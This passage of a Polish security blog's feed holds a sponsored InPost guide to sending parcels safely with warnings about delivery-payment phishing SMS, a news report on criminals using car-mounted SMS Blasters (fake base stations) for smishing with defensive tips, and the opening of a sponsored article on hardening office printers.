		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Nadanie paczki może być szybkie i wygodne, ale tylko wtedy, gdy cały proces jest dobrze uporządkowany. InPost Mobile pozwala nadać przesyłkę bez drukowania etykiety i ogranicza liczbę kroków, a przy okazji pomaga zmniejszyć ryzyko błędów. Nadanie paczki zaczyna się przed uruchomieniem aplikacji Zanim użytkownik kliknie „nadaj”, musi zrobić rzecz najważniejszą: dobrze przygotować przesyłkę. InPost zaleca, [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/"><![CDATA[<p>Nadanie paczki może być szybkie i wygodne, ale tylko wtedy, gdy cały proces jest dobrze uporządkowany. InPost Mobile pozwala nadać przesyłkę bez drukowania etykiety i ogranicza liczbę kroków, a przy okazji pomaga zmniejszyć ryzyko błędów.<span id="more-27040"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-600x335.jpg" alt="" width="600" height="335" class="aligncenter size-large wp-image-27043" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-600x335.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-350x196.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-768x429.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy.jpg 1320w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Nadanie paczki zaczyna się przed uruchomieniem aplikacji</h3>
<p class="p3">Zanim użytkownik kliknie „nadaj”, musi zrobić rzecz najważniejszą: dobrze przygotować przesyłkę. InPost zaleca, by <b>opakowanie było dopasowane do zawartości, odpowiednio wytrzymałe i wypełnione</b> tak, aby rzeczy nie przemieszczały się w środku. Bezpieczne nadanie paczki zaczyna się od pudełka, nie od ekranu telefonu.</p>
<p class="p3">To ważny aspekt, który często bywa lekceważony. Niesłusznie. Źle zabezpieczona paczka może zamienić prostą wysyłkę w reklamację, a pośpiech przy pakowaniu zwykle mści się właśnie wtedy, gdy przesyłka trafia do obiegu.</p>
<h3>InPost Mobile upraszcza nadanie paczki</h3>
<p class="p3">Najmocniejszy punkt aplikacji jest bardzo konkretny: <b>InPost Mobile pozwala nadać paczkę bez drukowania etykiety</b>. Po uzupełnieniu danych i opłaceniu przesyłki użytkownik dostaje w aplikacji <b>9-cyfrowy kod nadania oraz kod QR ważny przez 30 dni</b>. Z ich użyciem można dokończyć <b>nadanie paczki</b> poprzez Paczkomat lub Appkomat.</p>
<p class="p3">To rozwiązanie jest wygodne, ale jego znaczenie nie sprowadza się do wygody. Kiedy płatność, kod i samo nadanie są zamknięte w jednym oficjalnym narzędziu, użytkownik rzadziej zaczyna szukać informacji po mailach, zrzutach ekranu i wiadomościach SMS. A właśnie w takim rozproszeniu najłatwiej o błąd.</p>
<p class="p3">Przy samym urządzeniu proces też został uproszczony. InPost podaje, że <b>skrytkę można otworzyć zdalnie z poziomu aplikacji</b>, a alternatywą jest zeskanowanie kodu QR. Mniej kroków oznacza tu nie tylko oszczędność czasu, ale też mniej okazji do nerwowych decyzji.</p>
<p><a href="https://inpost.pl/SzybkieNadania"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-600x401.jpg" alt="" width="600" height="401" class="aligncenter size-large wp-image-27042" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-600x401.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-350x234.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2-768x513.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy2.jpg 1120w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak bezpiecznie nadać paczkę?</h3>
<p class="p3">Samo <b>nadanie paczki przez Paczkomat</b> zostało maksymalnie uproszczone. W aplikacji <b>InPost Mobile</b> cały proces można przejść bez drukowania etykiety:</p>
<ul class="ul1">
<li class="li3">otworzyć aplikację <b>InPost Mobile</b>,</li>
<li class="li3">wybrać opcję <b>„Nowa przesyłka”</b>, a następnie <b>„Nadaj”</b>,</li>
<li class="li3">wskazać <b>rozmiar paczki</b> i <b>sposób dostawy</b>,</li>
<li class="li3">wpisać <b>dane odbiorcy</b>,</li>
<li class="li3">opłacić przesyłkę online,</li>
<li class="li3">odebrać <b>kod nadania</b> oraz <b>kod QR</b>,</li>
<li class="li3">przy dowolnym automacie <b>Paczkomat</b> otworzyć skrytkę zdalnie w aplikacji, zeskanować kod QR albo wpisać kod na ekranie urządzenia,</li>
<li class="li3">włożyć paczkę do środka, zamknąć skrytkę i <b>potwierdzić nadanie</b>.</li>
</ul>
<p class="p3">To rozwiązanie jest wygodne zwłaszcza wtedy, gdy liczy się czas. <b>Nadanie paczki</b> można zrealizować o dowolnej porze, bez stania w kolejce, bez drukowania etykiety i bez dopasowywania planu dnia do godzin otwarcia placówki.</p>
<p class="p3">Jeśli wolisz, skorzystaj z nadania paczki przez <b>oficjalną stronę InPost: </b><a href="https://inpost.pl/SzybkieNadania"><span class="s3">https://inpost.pl/SzybkieNadania</span></a>.</p>
<h3>Najsłabszym ogniwem bywa wiadomość spoza oficjalnego kanału</h3>
<p class="p3">W praktyce problemem nie jest dziś samo <b>nadanie paczki</b>, tylko wszystko, co dzieje się wokół niego. Wiadomość o dopłacie. Link do „potwierdzenia danych”. SMS, który wygląda zwyczajnie, bo zawiera słowo „paczka” i odwołuje się do pośpiechu. To znany mechanizm. InPost ostrzega, że <b>nigdy nie wysyła SMS-ów z informacją o dopłatach</b>, a podejrzane komunikaty należy sprawdzać u źródła.</p>
<p class="p3">Ten kontekst bezpieczeństwa jest dziś równie ważny jak sama wygoda nadania. Rządowe materiały przypominają, że podejrzane SMS-y można zgłaszać do CERT Polska na numer 8080, najlepiej przekazując całą wiadomość w oryginalnej formie. <b>Najbezpieczniejsze nadanie paczki to takie, które użytkownik prowadzi w jednym oficjalnym kanale i bez odruchowego klikania w linki.</b> To praktyczny wniosek z zaleceń InPost oraz CERT Polska.</p>
<p class="p6">
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-350x232.jpg" alt="" width="350" height="232" class="aligncenter size-medium wp-image-27041" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-350x232.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-600x398.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3-768x509.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy3.jpg 1110w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Co naprawdę warto zrobić przed nadaniem paczki?</h3>
<p class="p3">Najprostsze zasady zwykle działają najlepiej:</p>
<ul class="ul1">
<li class="li3"><b>dobrze zabezpieczyć zawartość i wypełnić wolne przestrzenie w opakowaniu,</b> żeby przesyłka nie przemieszczała się w środku;</li>
<li class="li3"><b>nadać paczkę przez InPost Mobile </b>bez etykiety, zamiast rozpraszać proces między różne kanały;</li>
<li class="li3"><b>sprawdzać kody i przebieg nadania w aplikacji,</b> a nie w podejrzanych wiadomościach;</li>
<li class="li3"><b>nie reagować odruchowo na SMS o dopłacie albo „problemie z przesyłką”,</b> tylko zweryfikować sprawę u źródła;</li>
<li class="li3"><b>aktualizować aplikację i zabezpieczyć telefon hasłem lub biometrią,</b> bo to ogranicza najprostsze scenariusze nadużyć;</li>
<li class="li3"><b>podejrzane SMS-y przekazywać do CERT Polska na 8080.</b></li>
</ul>
<h3>Wniosek</h3>
<p class="p3">W dobrze ułożonym procesie InPost Mobile nie jest gadżetem, tylko narzędziem, które domyka nadanie paczki w jednym miejscu: od opłacenia przesyłki po kod potrzebny do otwarcia skrytki. To porządkuje proces. Uspokaja go. I ogranicza liczbę momentów, w których użytkownik działa chaotycznie.</p>
<p class="p3"><b>Dobrze zorganizowane nadanie paczki to mniej chaosu, mniej błędów i mniej okazji dla oszustów.</b> Fałszywe komunikaty o przesyłkach niestety stały się jednym z najprostszych narzędzi phishingu, a więc przewidywalność jest realną wartością.</p>
<p><em>Autorem niniejszego artykułu jest firma InPost, a za jego publikację otrzymaliśmy wynagrodzenie</em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/#comments" rel="replies" thr:count="2" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/feed/atom/" rel="replies" thr:count="2" type="application/atom+xml"/>
			<thr:total>2</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Jeżdżą po mieście i atakują telefony korzystając z SMS Blasterów ukrytych w bagażnikach]]></title>
		<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27050</id>
		<updated>2026-04-29T08:05:31Z</updated>
		<published>2026-04-28T10:41:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="banki"/><category scheme="https://niebezpiecznik.pl" term="BTS"/><category scheme="https://niebezpiecznik.pl" term="IMSI Catcher"/><category scheme="https://niebezpiecznik.pl" term="jaskółka"/><category scheme="https://niebezpiecznik.pl" term="Kanada"/><category scheme="https://niebezpiecznik.pl" term="MITM"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="SMS Blaster"/><category scheme="https://niebezpiecznik.pl" term="smsishing"/><category scheme="https://niebezpiecznik.pl" term="telefonia komórkowa"/><category scheme="https://niebezpiecznik.pl" term="Toronto"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wyobraź sobie, że stoisz w korku. Albo spacerujesz po chodniku z psem. Tymczasem w samochodzie na światłach siedzi typ, który uśmiecha się i w tym samym momencie zarabia tysiące złotych. Bo w bagażniku samochodu ma &#8220;SMS Blastera&#8220;. Tym sprzętem przejmuje łączność Twojego smartfona i wstrzuje Ci SMS-a z informacją od Twojego banku. A facetowi w garniturze, który [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/"><![CDATA[<p>Wyobraź sobie, że stoisz w korku. Albo spacerujesz po chodniku z psem. Tymczasem w samochodzie na światłach siedzi typ, który uśmiecha się i w tym samym momencie zarabia tysiące złotych. Bo w bagażniku samochodu ma &#8220;<strong>SMS Blastera</strong>&#8220;. Tym sprzętem przejmuje łączność Twojego smartfona i wstrzuje Ci SMS-a z informacją od Twojego banku. A facetowi w garniturze, który właśnie Cię minął, SMS-a o &#8220;niezapłaconej paczce&#8221;. Co najgorsze, przed tym atakiem nie obronią Cię żadne filtry po stronie operatora&#8230;<span id="more-27050"></span></p>
<div id="attachment_27052" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-scaled.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-27052" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-600x337.jpg" alt="" width="600" height="337" class="size-large wp-image-27052" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-600x337.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-1536x863.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-turcja-2048x1151.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-27052" class="wp-caption-text">SMS Blaster wykorzystywany przez gang w Turcji</p></div>
<h3>SMS Blastery w natarciu</h3>
<p>W ciągu ostatnich miesięcy służby w różnych częściach świata zatrzymały osoby korzystające z tzw. &#8220;SMS Blasterów&#8221; ukrytych w samochodach. SMS Blastery to odpowiednio skonfigurowane <strong>IMSI Catchery</strong>, czyli fałszywe stacje <strong>BTS</strong>, które <strong>przepinają na siebie sygnał telefonii komórkowej okolicznych smartfonów</strong>, a następnie wysyłają na te smartfony wiarygodnie wyglądające SMS-y podszywające się pod różne instytucje. </p>
<p>Efekt? Taki sam jak przy <a href="https://niebezpiecznik.pl/post/spoofing-sms-czyli-falszowanie-nadawcy-sms-a/" target="_blank">spoofingu SMS</a>, ale atak tego typu <strong>nie jest możliwy do odfiltrowania przez operatorów, bo nie przechodzi przez ich infrastrukturę</strong>. Jest też dodatkowe zagrożenie wynikające z tego ataku &#8212; <strong>ofiary nie mogą korzystać z połączeń alarmowych</strong>, co może skończyć się tragiczniej niż strata pieniędzy.  </p>
<h3>Jak to działa i dlaczego jest groźne?</h3>
<p>Ten atak w brutalny sposób wykorzystuje to, jak zaprojektowane są sieci komórkowe. Telefony komórkowe automatycznie łączą się z nadajnikiem o najsilniejszym sygnale. Gdy &#8220;SMS Blaster&#8221; znajdzie się blisko Ciebie &#8212; na przykład w stojącym obok na światłach aucie &#8212; Twój telefon bez Twojej wiedzy przeloguje się do przestępczej sieci. Wtedy atakujący może zrobić kilka groźnych rzeczy:</p>
<ul class="margin">
<li>Wysłać Ci SMS-a z fałszywym linkiem (tzw. smishing), swobodnie podmieniając pole nadawcy. Operator Twojej sieci nawet tego nie zauważy, w przeciwieństwie do ataków wykorzystujących różne internetowe bramki do fałszowania nadpisu SMS, które <a href="https://niebezpiecznik.pl/tag/spoofing-sms/" target="_blank">regularnie opisujemy</a>.</li>
<li>Odciąć Cię od prawdziwej sieci operatora, uniemożliwiając korzystanie ze smartfona także do wezwania pomocy </li>
<li>Pobrać identyfikujące Cię metadane, które następnie można wykorzystać do &#8220;śledzenia&#8221; Twojej lokalizacji. Przy czym SMS Blastery nie są tym zainteresowane, to raczej domena profesjonalnych IMSI Catcherów wykorzystywanych przez służby (które swoją drogą nazywają je &#8220;jaskółkami&#8221;). </li>
<li>Podsłuchać prowadzone przez Ciebie rozmowy telefoniczne lub nieszyfrowany ruch internetowy. Aby tego dokonać urządzenie musiałoby wykonać atak MITM, złamać szyfrowanie (co jest możliwe dla niektórych standardów) lub wymusić połączenie po nieszyfrowanych protokołach. Ale to również domena IMSI Catcherów a nie SMS Blasterów, głównie ze względu na  koszt.</li>
</ul>
<p> <br />
<div id="attachment_27051" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-27051" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-600x472.jpg" alt="" width="600" height="472" class="size-large wp-image-27051" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-600x472.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster-318x250.jpg 318w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/sms-blaster.jpg 604w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-27051" class="wp-caption-text">SMS Blaster &#8211; materiały policji</p></div></p>
<div class="info"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Przestępcy korzystają z różnych sztuczek i narzędzi, ale niezależnie od użytej przez nich metody ataku, jeśli jesteś dobrze przygotowany i zabezpieczony, ciężko będzie im wykraść Twoje dane lub pieniądze albo naruszyć Twoją prywatność. Pytanie, czy wiesz jak poprawnie się zabezpieczyć? Jeśli nie, <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">zaproś nas do swojej firmy</a> &#8212; przeprowadzimy dla Was krótkie szkolenie i przygotujemy Was na wszystkie groźne sytuacje, jakie mogą Was spotkać. A jeśli jesteś osobą prywatną, to wpadnij na nasz otwarty wykład <a href="https://bilety.niebezpiecznik.pl" target="_blank">Jak Nie Dać Się Zhackować?</a>, który jest dedykowany osobom nietechnicznym i w trakcie którego uczymy jak zabezpieczyć się w kontekście prywatnym, a nie służbowym.</div>
<h3>Trójka z Kanady</h3>
<p>W kanadyjskim Toronto <a href="https://www.youtube.com/watch?v=H2JKpTmy5bc" target="_blank" rel="nofollow">aresztowano</a> trzech mężczyzn, którzy przez kilka miesięcy (!), bo co najmniej od listopada 2025, wozili po mieście sprzęt udający stację bazową (BTS). Według Toronto Police Service to pierwszy znany przypadek użycia takiej technologii w Kanadzie. Sprawa nosi kryptonim Project Lighthouse, a zatrzymanym postawiono łącznie 44 zarzuty.</p>
<h3>To nie są nowe ataki</h3>
<p>Tego typu ataki to nie nowość. Ponad 10 lat temu na rynku były dostępne tzw. SMS Messanging Gateways, które można było kupić przez chińskie portale. I które wtedy służyły bardziej do wysyłania SMS-owego spamu, reklam okolicznych biznesów. Dziś ta sama technologia jest wykorzystywana nie do napędzania klientów, a do kradzieży środków. Warto też wspomnieć <a href="https://www.youtube.com/watch?v=WGxF1N3RESQ" rel="nofollow">tę prezentację</a> z BlackHata z 2013 roku o bieda-imsi-catcherach z przerabianych femtocelli.</p>
<p>Incydent z Toronto to nie jedyny tego typu przypadek. W 2024 w Brazylii <a href="https://g1.globo.com/google/amp/sp/sao-paulo/noticia/2024/07/25/carro-do-golpe-policia-investiga-quadrilha-que-usa-veiculo-com-antena-e-computador-para-rastrear-celulares-e-aplicar-golpes-em-sp.ghtml" target="_blank"  rel="nofollow">rozbito</a> gang poruszający się Jeepem z potężną anteną w bagażniku i laptopem na tylnym siedzeniu. Zatrzymany kierowca otrzymywał 1000 reali tygodniowo za samo &#8220;wożenie się&#8221; po bogatych dzielnicach Sao Paulo. Sprzęt automatycznie namierzał telefony w promieniu 5 metrów i wysyłał SMS-y podszywające się pod znane banki. Podobny incydent miał miejsce w Omanie, gdzie policja <a href="https://commsrisk.com/chinese-tourist-caught-driving-smishing-sms-blaster-around-oman/" target="_blank"  rel="nofollow">zatrzymała</a> turystkę z Chin. Kobieta z wypożyczonego auta masowo rozsyłała linki phishingowe przy użyciu sms blastera.  </p>
<h3>Mam smartfona &#8212; co robić, jak żyć?</h3>
<p>Mając smartfona jesteś na ten atak podatny, niezależnie od rodzaju urządzenia czy systemu operacyjnego. Choć na razie brak doniesień o tego typu atakach realizowanych na terenie naszego kraju, warto dmuchać na zimne. Dlatego: </p>
<ul>
<li>Wyłącz obsługę przestarzałej sieci 2G w swoim smartfonie. Wiele tanich SMS Blasterów opiera się na tzw. &#8220;downgrade attack&#8221; do sieci drugiej generacji, z której łatwo przechwycić ruch.</li>
<li>Traktuj każdą wiadomość SMS jako całkowicie niezaufaną &#8212; bo taka de facto jest. </li>
<li>Ważne rozmowy prowadź przez szyfrowane komunikatory E2EE (np. Signal).</li>
</ul>
<p>Warto też wszelkie podejrzane trudności w nawiązaniu połączenia ze 112 zgłaszać do UKE. Kto wie, może przyczynicie się do wykrycia pierwszej tego typu operacji w Polsce.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/#comments" rel="replies" thr:count="36" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/sms-blaster-imsi-catcher-bts-spoofing/feed/atom/" rel="replies" thr:count="36" type="application/atom+xml"/>
			<thr:total>36</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Dlaczego drukarki w stanie fabrycznym to stan zagrożenia, a nie gotowości]]></title>
		<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27035</id>
		<updated>2026-04-27T16:45:56Z</updated>
		<published>2026-04-27T11:55:07Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="Canon"/><category scheme="https://niebezpiecznik.pl" term="drukarki"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-250x250.jpg 250w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4.jpg 480w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><![CDATA[<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg" class="aligncenter size-large wp-image-27048" width="600" height="263" alt="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-350x153.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-768x336.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg 800w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. Jeśli zostawisz je w konfiguracji fabrycznej, to nie masz „drukarki”. Masz hosta z dość ciekawą powierzchnią ataku. I cyberninja o tym wie&#8230;<span id="more-27035"></span></p>
<div class="info">Ten tekst otwiera cykl o bezpieczeństwie urządzeń drukujących w środowisku firmowym. W kolejnych rozdziałach będziemy przechodzić przez etapy „<a href="https://niebezpiecznik.pl/samuraj" target="_blank">Drogi Samuraja</a>”: od stanu fabrycznego, przez hardening i monitoring, aż po druk w duchu Zero Trust i budowę spójnego ekosystemu obrony. Dlatego, jeśli chcesz podążać tą ścieżką razem z nami &#8211; śledź kolejne odsłony. Każda część cyklu będzie kolejnym krokiem na tatami, kolejnym elementem sztuki ochrony danych, której Samuraj nie odkłada na później.</div>
<p>&nbsp;<br />
SPIS TREŚCI</p>
<ul class="nomargin">
<li><a href="#rozgrzewka">Rozgrzewka na macie – ustawienia fabryczne jako punkt startowy</a></li>
<li><a href="#bezbronnosc">Nie jesteś bezbronny &#8211; utwardzanie urządzeń</a></li>
<li><a href="#hardening">Hardening drukarek – jak się do tego zabrać?</a></li>
<li><a href="#flota">Masz flotę? Potrzebujesz zarządzania</a></li>
</ul>
<p>Nie masz czasu na lekturę&nbsp;całości artykułu? Zacznij od filmu! Zobacz, jak patrzymy na to zagadnienie, a po konkrety i przykłady &#8212; kontynuuj lekturę artykułu.</p>
<p><iframe loading="lazy" width="560" height="315" src="https://www.youtube.com/embed/vL1NCmNj2Nc?si=zHx65UjMlM9rrvxA" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p><a name="rozgrzewka" href=""></a></p>
<h3>Rozgrzewka na macie</h3>
<p>Nowoczesne urządzenia wielofunkcyjne są projektowane tak, żebyś mógł je postawić i po 10 minutach usłyszeć: „drukuje!”. Dla użytkownika to ideał: zero pytań, zero błądzenia po ustawieniach, minimalny udział IT.</p>
<p>Takie urządzenie wydrukuje wszystko bez pytania o tożsamość użytkownika. Skanowanie i kopiowanie działają równie swobodnie: jeden szybki ruch, jeden „scan to email”, i dokument z pieczątką wylatuje poza firmę bez śladu w logach. A gdy urządzenie wystawia równocześnie panel webowy, SMB, FTP, WebDAV, SNMP czy IPP, otwiera w murach sieci tyle bram i furtek, ile dróg i ścieżek prowadzi do oblężonego zamku &#8211; i zazwyczaj nikt ich nie patroluje.</p>
<p class="p1">Do tego dochodzą nieszyfrowane transmisje i domyślne hasła administratora, które nadal są jednym z najczęstszych wektorów ataku.</p>
<p>Jednak <strong>z perspektywy bezpieczeństwa ustawienia fabryczne należałoby traktować wyłącznie jako tryb startowy</strong>.<span class="Apple-converted-space">&nbsp; </span>Urządzenie bez utwardzonej konfiguracji jest jak wojownik bez zbroi &#8211; pierwszy cios cyberninja może go powalić.</p>
<p><a name="bezbronnosc" href=""></a></p>
<h3>Dobra wiadomość: nie jesteś bezbronny.</h3>
<p class="p1">Zbroją, która będzie Cię chronić jest <strong>hardening urządzenia, </strong>czyli takie skonfigurowanie jego ustawień, żeby było trudniejsze do zaatakowania, przejęcia albo wykorzystania jako „furtka” do firmowej sieci.</p>
<p>Wystarczy, że robisz to raz, porządnie, a potem utrzymasz jako standard &#8211; w duchu <strong>NIST SP 800</strong> (800-53/171/88/40) &#8211; czyli zestawu wytycznych amerykańskiego National Institute of Standards and Technology dotyczących bezpieczeństwa systemów IT &#8211; i z kryptografią, której nie da się zbyć tekstem „to tylko drukarka” (<b>FIPS 140-3</b>).</p>
<p class="p1">&#8211; Utwardzanie MFP to nie jest ‘włączenie jednego checkboxa’. To dopasowanie urządzenia do polityk bezpieczeństwa organizacji &#8211; tak, żeby drukarka była tak samo przewidywalna i kontrolowana jak serwer czy laptop – komentuje <strong>Darek Szwed</strong>, <b>ekspert Canon Polska w obszarze bezpieczeństwa danych</b>.</p>
<p><a name="hardening" href=""></a></p>
<h3>Hardening drukarek: Jak się do tego zabrać?</h3>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po pierwsze: Rozpoznaj taktykę przeciwnika. Drukarka też ma swoje słabe punkty, które mogą stać się celem ataku.</p>
</blockquote>
<p class="p1">Zanim zaczniesz cokolwiek „zabezpieczać”, zrób ten prosty test mentalny: <strong>Czy pozwoliłbyś, żeby w twojej sieci stał komputer z dyskiem i kilkoma usługami, którego nikt nie patchuje, nikt nie loguje, a panel admina jest dostępny z VLAN-u użytkowników?</strong></p>
<p class="p1">Jeśli odpowiedź brzmi „nie”, to gratulacje. Przy okazji… właśnie opisałeś typową drukarkę w trybie fabrycznym.</p>
